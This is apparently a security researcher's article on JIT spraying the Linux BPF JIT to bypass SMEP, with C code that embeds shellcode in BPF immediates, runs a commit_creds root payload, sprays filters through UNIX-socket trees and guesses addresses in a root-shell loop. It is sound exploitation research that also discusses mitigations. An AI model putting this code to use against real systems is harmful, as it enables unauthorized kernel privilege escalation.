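The byte layout described above can be reproduced in a few lines of C. This is only an illustrative sketch: `build_spray` is a hypothetical helper, not part of the article's code, and it simply writes the bytes a JIT would emit for a run of `mov $imm32, %eax` instructions so that the view from offset 1 can be inspected.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: write n "mov $imm32, %eax" instructions (5 bytes
 * each) into out. payload[i] holds the three attacker-chosen bytes that
 * form the low part of immediate i, in memory order (ZZ, YY, XX). */
size_t build_spray(uint8_t *out, size_t out_cap,
                   const uint8_t payload[][3], size_t n) {
    assert(out_cap >= 5 * n);
    size_t pos = 0;
    for (size_t i = 0; i < n; i++) {
        out[pos++] = 0xb8;          /* opcode: mov imm32, %eax */
        out[pos++] = payload[i][0]; /* ZZ: first payload byte */
        out[pos++] = payload[i][1]; /* YY */
        out[pos++] = payload[i][2]; /* XX */
        out[pos++] = 0xa8;          /* top immediate byte; decodes as
                                       "test imm8, %al" when execution
                                       starts at offset 1 */
    }
    return pos;
}
```

Starting to decode at `out + 1` gives three payload bytes, then `a8 b8`, then the next three payload bytes, which is exactly the second listing above.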

Attacking the BPF JIT

Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are virtual machine programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally implements the BPF virtual machine using a just-in-time compiler.

For our JIT spray attack, we will build a BPF program in memory.

size_t code_len = 0;
struct sock_filter code[1024];

void emit_bpf(uint16_t opcode, uint32_t operand) {
    code[code_len++] = (struct sock_filter) BPF_STMT(opcode, operand);
}

A BPF "load immediate" instruction will compile to mov $x, %eax. We embed our payload instructions inside these, exactly as we saw above.
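The excerpts here do not show how the instruction array becomes the `filt` object that is later passed to `setsockopt`. A minimal sketch, assuming the standard `struct sock_fprog` from `<linux/filter.h>`, might look like the following. The names `prog`, `emit_insn` and `finish_program` are made up for illustration, and the trailing `BPF_RET` is there because the kernel's classic BPF checker rejects programs whose last instruction is not a return.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <linux/filter.h>

#define MAX_INSNS 1024

/* Hypothetical stand-ins for the article's code[] and code_len. */
struct sock_filter prog[MAX_INSNS];
size_t prog_len = 0;

/* Append one classic BPF instruction with no jump offsets. */
void emit_insn(uint16_t opcode, uint32_t operand) {
    assert(prog_len < MAX_INSNS);
    prog[prog_len++] = (struct sock_filter) BPF_STMT(opcode, operand);
}

/* Terminate the program and describe it in the form SO_ATTACH_FILTER
 * expects. Returning 0 from the filter means "drop every packet". */
struct sock_fprog finish_program(void) {
    emit_insn(BPF_RET + BPF_K, 0);
    struct sock_fprog fprog = {
        .len = (unsigned short) prog_len,
        .filter = prog,
    };
    return fprog;
}
```

The resulting structure is what would be handed to `setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, ...)`.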

// Embed a three-byte x86 instruction.
void emit3(uint8_t x, uint8_t y, uint8_t z) {
    union {
        uint8_t buf[4];
        uint32_t imm;
    } operand = {
        .buf = { x, y, z, 0xa8 }
    };

    emit_bpf(BPF_LD+BPF_IMM, operand.imm);
}

// Pad shorter instructions with nops.
#define emit2(_x, _y) emit3((_x), (_y), 0x90)
#define emit1(_x) emit3((_x), 0x90, 0x90)

Remember, the byte a8 eats the opcode b8 from the following legitimate mov instruction, turning into the harmless instruction test $0xb8, %al.
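The union in `emit3` depends on the host being little-endian, which is always true on the x86 targets discussed here. As a sketch of the same packing written with shifts, so that the byte order is explicit, consider the hypothetical helpers below (`pack3` and `matches_union_layout` are not from the article):

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Build the 32-bit immediate whose little-endian encoding is x, y, z, a8. */
uint32_t pack3(uint8_t x, uint8_t y, uint8_t z) {
    return (uint32_t) x
         | ((uint32_t) y << 8)
         | ((uint32_t) z << 16)
         | ((uint32_t) 0xa8 << 24);
}

/* Returns 1 when reading the four bytes through memory gives the same
 * value as pack3, i.e. when the host is little-endian. */
int matches_union_layout(uint8_t x, uint8_t y, uint8_t z) {
    const uint8_t buf[4] = { x, y, z, 0xa8 };
    uint32_t imm;
    assert(sizeof imm == sizeof buf);
    memcpy(&imm, buf, sizeof imm);
    return imm == pack3(x, y, z);
}
```

For example, the bytes `48 31 ff` (`xor %rdi, %rdi`) pack into the immediate `0xa8ff3148`.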

Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.

void emit_call(uint32_t addr) {
    emit2(0xb4, (addr & 0xff000000) >> 24); // mov $x, %ah
    emit2(0xb0, (addr & 0x00ff0000) >> 16); // mov $x, %al
    emit3(0xc1, 0xe0, 0x10);                // shl $16, %eax
    emit2(0xb4, (addr & 0x0000ff00) >> 8);  // mov $x, %ah
    emit2(0xb0, (addr & 0x000000ff));       // mov $x, %al
    emit2(0x48, 0x98);                      // cltq
    emit2(0xff, 0xd0);                      // call *%rax
}

Then we can build a classic "get root" payload like so:

emit3(0x48, 0x31, 0xff); // xor %rdi, %rdi
emit_call(get_kernel_symbol("prepare_kernel_cred"));
emit3(0x48, 0x89, 0xc7); // mov %rax, %rdi
emit_call(get_kernel_symbol("commit_creds"));
emit1(0xc3);             // ret

This is just the C call

commit_creds(prepare_kernel_cred(0));

expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.
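The byte-at-a-time address load in `emit_call` can be checked in ordinary C by modelling the register updates. This is a sketch, not the article's code: `set_ah`, `set_al`, `simulate_emit_call_load` and `fits_sign_extended_32` are hypothetical names, and the final cast assumes the usual two's-complement conversion that GCC and Clang perform. The trick works because x86-64 kernel text and modules live in the top 2 GB of the address space, so the full address is the sign extension of its low 32 bits.

```c
#include <assert.h>
#include <stdint.h>

/* Model writes to the 8-bit sub-registers of %eax. */
uint32_t set_ah(uint32_t eax, uint8_t v) {
    return (eax & 0xffff00ffu) | ((uint32_t) v << 8);
}

uint32_t set_al(uint32_t eax, uint8_t v) {
    return (eax & 0xffffff00u) | v;
}

/* Replay the instruction sequence from emit_call and return %rax. */
uint64_t simulate_emit_call_load(uint32_t addr) {
    uint32_t eax = 0xdeadbeefu;                /* arbitrary stale contents */
    eax = set_ah(eax, (uint8_t) (addr >> 24)); /* mov $x, %ah */
    eax = set_al(eax, (uint8_t) (addr >> 16)); /* mov $x, %al */
    eax <<= 16;                                /* shl $16, %eax */
    eax = set_ah(eax, (uint8_t) (addr >> 8));  /* mov $x, %ah */
    eax = set_al(eax, (uint8_t) addr);         /* mov $x, %al */
    return (uint64_t) (int64_t) (int32_t) eax; /* cltq */
}

/* True when a 64-bit address survives truncation to 32 bits plus cltq. */
int fits_sign_extended_32(uint64_t kaddr) {
    return simulate_emit_call_load((uint32_t) kaddr) == kaddr;
}
```

Any address in the module region, such as `0xffffffffa0001003`, round-trips, while a low userspace address with bit 31 set would not.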

Looking up function addresses is a well-studied part of kernel exploitation. My get_kernel_symbol just greps through /proc/kallsyms, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.
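A lookup of this kind could be sketched as follows. This is not the author's `get_kernel_symbol`; the function names are hypothetical, and the code assumes the usual `/proc/kallsyms` line format of a hex address, a one-character type, and the symbol name. On systems that hide kernel pointers from unprivileged readers the addresses in that file read as zeros, so a real tool would need to treat a zero result as "unknown".

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parse one kallsyms-style line: "<hex address> <type> <name> [module]".
 * Returns 1 and stores the address if the line names `symbol`, else 0. */
int match_kallsyms_line(const char *line, const char *symbol,
                        uint64_t *addr_out) {
    unsigned long long addr;
    char type;
    char name[256];

    if (sscanf(line, "%llx %c %255s", &addr, &type, name) != 3)
        return 0;
    if (strcmp(name, symbol) != 0)
        return 0;
    *addr_out = (uint64_t) addr;
    return 1;
}

/* Scan an already-open symbol listing; returns 0 if the name is absent. */
uint64_t lookup_symbol(FILE *f, const char *symbol) {
    char line[512];
    uint64_t addr;

    assert(f != NULL);
    while (fgets(line, sizeof line, f)) {
        if (match_kallsyms_line(line, symbol, &addr))
            return addr;
    }
    return 0;
}
```

A caller would open `/proc/kallsyms` with `fopen` and pass the stream to `lookup_symbol`.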

Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.

Filling memory with sockets

The "spray" part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.

For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT uses module_alloc to allocate memory in the 1.5 GB space reserved for kernel modules. And the compiled program is aligned to a page, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.
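The arithmetic behind those figures can be spelled out. The sketch below uses the module region bounds that the article defines further on (`0xffffffffa0000000` to `0xfffffffffff00000`); the macro and function names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define REGION_START 0xffffffffa0000000ULL /* start of module space */
#define REGION_END   0xfffffffffff00000ULL /* end of module space */
#define PAGE_BYTES   0x1000ULL             /* 4 kB pages */

/* Number of page-aligned addresses a JIT-compiled program could occupy. */
uint64_t module_pages(void) {
    return (REGION_END - REGION_START) / PAGE_BYTES;
}

/* With `copies` sprayed programs, roughly one guess in this many hits. */
uint64_t guesses_per_hit(uint64_t copies) {
    assert(copies > 0);
    return module_pages() / copies;
}

/* Smallest b such that 2^b covers all candidate pages. */
unsigned bits_to_guess(uint64_t pages) {
    unsigned b = 0;
    while ((1ULL << b) < pages)
        b++;
    return b;
}
```

The region holds 392,960 pages, which is a little under 2^19, and 8000 copies give about one hit per 49 guesses, matching the "1 in 50" estimate.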

Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the resource limit on the number of open files. But there's a fun way around this limitation. (I learned this trick from Nelson Elhage but I haven't seen it published before.)

UNIX domain sockets can transmit things other than raw bytes. In particular, they can transmit file descriptors [1]. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD, including BPF programs!

So we can make as many BPF-filtered sockets as we want, as long as we send them into other sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth [2] of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.

#define SOCKET_FANOUT 20
#define SOCKET_DEPTH 3

// Create a socket with our BPF program attached.
// 'filt' is the struct sock_fprog that SO_ATTACH_FILTER expects;
// its definition is not shown here.
int create_filtered_socket(void) {
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &filt, sizeof(filt));
    return fd;
}

// Send an fd through a UNIX socket.
void send_fd(int dest, int fd_to_send);

// Create a whole bunch of filtered sockets.
// With a fanout of 20 and a depth of 3 this yields 20^3 = 8000 leaves.
void create_socket_tree(int parent, size_t depth) {
    int fds[2];
    size_t i;

    for (i=0; i<SOCKET_FANOUT; i++) {
        if (depth == (SOCKET_DEPTH - 1)) {
            // Leaf of the tree.
            // Create a filtered socket and send it to 'parent'.
            fds[0] = create_filtered_socket();
            send_fd(parent, fds[0]);
            close(fds[0]);
        } else {
            // Interior node of the tree.
            // Send a subtree into a UNIX socket pair.
            socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
            create_socket_tree(fds[0], depth+1);

            // Send the pair to 'parent' and close it.
            send_fd(parent, fds[0]);
            send_fd(parent, fds[1]);
            close(fds[0]);
            close(fds[1]);
        }
    }
}

The interface for sending FDs through a UNIX socket is really, really ugly, so I didn't show that code here. You can check out the implementation of send_fd if you want to.
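For readers who have not seen that interface, here is a minimal sketch of passing a descriptor with `SCM_RIGHTS` ancillary data. It is not the author's `send_fd`: the names `send_fd_sketch` and `recv_fd_sketch` are hypothetical, the sender returns a status code instead of `void`, and the receive side is included only so the round trip can be tried out.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Control buffer sized and aligned for exactly one descriptor. */
union fd_ctrl {
    char buf[CMSG_SPACE(sizeof(int))];
    struct cmsghdr align;
};

/* Send fd_to_send over the UNIX socket dest. Returns 0 on success. */
int send_fd_sketch(int dest, int fd_to_send) {
    char dummy = 'x'; /* at least one byte of ordinary data is sent */
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union fd_ctrl ctrl;
    struct msghdr msg;

    assert(fd_to_send >= 0);
    memset(&ctrl, 0, sizeof ctrl);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof ctrl.buf;

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));

    return sendmsg(dest, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor from src. Returns the new fd, or -1 on error. */
int recv_fd_sketch(int src) {
    char dummy;
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union fd_ctrl ctrl;
    struct msghdr msg;
    int fd;

    memset(&ctrl, 0, sizeof ctrl);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof ctrl.buf;

    if (recvmsg(src, &msg, 0) != 1)
        return -1;

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET ||
        cmsg->cmsg_type != SCM_RIGHTS)
        return -1;

    memcpy(&fd, CMSG_DATA(cmsg), sizeof fd);
    return fd;
}
```

Sending a descriptor, closing it in the sender, and only then receiving it on the other end still yields a working descriptor, which is the property the socket tree relies on.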

The exploit

Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure kernel module which will jump to any address we write to /proc/jump.

We know that a JIT-produced code page is somewhere in the region used for kernel modules. We want to land 3 bytes into this page, skipping an xor %eax, %eax (31 c0) and the initial b8 opcode.

#define MODULE_START 0xffffffffa0000000UL
#define MODULE_END 0xfffffffffff00000UL
#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)
#define PAYLOAD_OFFSET 3

A bad guess will likely oops the kernel and kill the current process. So we fork off child processes to do the guessing, and keep doing this as long as they're dying with SIGKILL.

int status, jump_fd, urandom;
unsigned int pgnum;
uint64_t payload_addr;

// ...

jump_fd = open("/proc/jump", O_WRONLY);
urandom = open("/dev/urandom", O_RDONLY);

do {
    if (!fork()) {
        // Child process
        read(urandom, &pgnum, sizeof(pgnum));
        pgnum %= MODULE_PAGES;
        payload_addr = MODULE_START + (0x1000 * pgnum) + PAYLOAD_OFFSET;
        write(jump_fd, &payload_addr, sizeof(payload_addr));
        execl("/bin/sh", "sh", NULL); // Root shell!
        _exit(1); // Only reached if execl fails; don't fall back into the loop
    } else {
        wait(&status);
    }
} while (WIFSIGNALED(status) && (WTERMSIG(status) == SIGKILL));

The forked children get a copy of the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.
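The retry condition of that loop can be isolated and exercised without touching the kernel. In the sketch below, all names are hypothetical and a child that raises SIGKILL on itself stands in for a process killed by an oops; it only illustrates how the wait status is interpreted.

```c
#include <assert.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* True when the child died from SIGKILL, i.e. the guess should be retried. */
int killed_by_sigkill(int status) {
    return WIFSIGNALED(status) && WTERMSIG(status) == SIGKILL;
}

/* Run attempt() in a forked child and return the child's wait status. */
int run_in_child(void (*attempt)(void)) {
    int status = 0;
    pid_t pid = fork();

    assert(pid >= 0);
    if (pid == 0) {
        attempt();
        _exit(0); /* the attempt returned normally */
    }
    pid_t waited = waitpid(pid, &status, 0);
    assert(waited == pid);
    return status;
}

/* Stand-in for a bad guess: the process is killed outright. */
void die_like_a_bad_guess(void) {
    raise(SIGKILL);
}

/* Stand-in for a good guess: the attempt returns normally. */
void survive(void) {
}
```

A child that exits normally ends the loop, which in the exploit corresponds to the root shell having run and exited.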

Notes

The full source is available on GitHub. It includes some error handling and cleanup code that I elided above.

I'll admit that this is mostly a curiosity, for two reasons:

- SMEP is not widely deployed yet.

- The BPF JIT is disabled by default, and distributions don't enable it.

Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for process sandboxing as well.

The BPF JIT is enabled by writing 1 to /proc/sys/net/core/bpf_jit_enable. You can write 2 to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.
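From a program, flipping that setting is just a short write to the file. A minimal sketch follows, with a hypothetical helper name; on a real system the write to `/proc/sys/net/core/bpf_jit_enable` requires root.

```c
#include <assert.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Write a short string such as "1" or "2" to an existing settings file.
 * Returns 0 on success and -1 if the file cannot be opened or written. */
int write_setting(const char *path, const char *value) {
    assert(path != NULL && value != NULL);

    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;

    size_t len = strlen(value);
    ssize_t written = write(fd, value, len);
    close(fd);
    return written == (ssize_t) len ? 0 : -1;
}
```

Calling `write_setting("/proc/sys/net/core/bpf_jit_enable", "2")` would select the debug mode described above.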

I don't have a CPU with SMEP, but I did try a grsecurity / PaX hardened kernel. PaX's KERNEXEC feature implements [3] in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)

The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...

[1] Actually, file descriptions. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.

[2] While testing this code, I got the error ETOOMANYREFS. This was easy to track down, as there's only one place in the entire kernel where it is used.

[3] On i386, KERNEXEC uses x86 segmentation, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a GCC plugin to instrument every computed control flow instruction in the kernel. Specifically, it ors the target address with (1 << 63). If the target was a userspace address, the new address will be non-canonical and the processor will fault.
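The effect of that or-with-bit-63 instrumentation is easy to see with a couple of addresses. The sketch below assumes 48-bit virtual addresses, where an address is canonical only if bits 63 through 47 are all equal; the function names are hypothetical and this models the idea only, not the PaX plugin itself.

```c
#include <assert.h>
#include <stdint.h>

/* Canonical check for 48-bit virtual addressing: bits 63..47 must be
 * all zeros (user half) or all ones (kernel half). */
int is_canonical48(uint64_t addr) {
    uint64_t top = addr >> 47; /* the 17 highest bits */
    return top == 0 || top == 0x1ffff;
}

/* Model of the instrumentation: force bit 63 on before an indirect jump. */
uint64_t kernexec_mask(uint64_t target) {
    return target | (1ULL << 63);
}

/* Worked examples: a kernel module address is unchanged, while a typical
 * userspace address becomes non-canonical and would fault when used. */
void kernexec_examples(void) {
    assert(kernexec_mask(0xffffffffa0000003ULL) == 0xffffffffa0000003ULL);
    assert(is_canonical48(kernexec_mask(0xffffffffa0000003ULL)));
    assert(kernexec_mask(0x400000ULL) == 0x8000000000400000ULL);
    assert(!is_canonical48(kernexec_mask(0x400000ULL)));
}
```

Because the sprayed payload already lives at a kernel address, the mask leaves it untouched, which is consistent with the JIT spray succeeding under KERNEXEC.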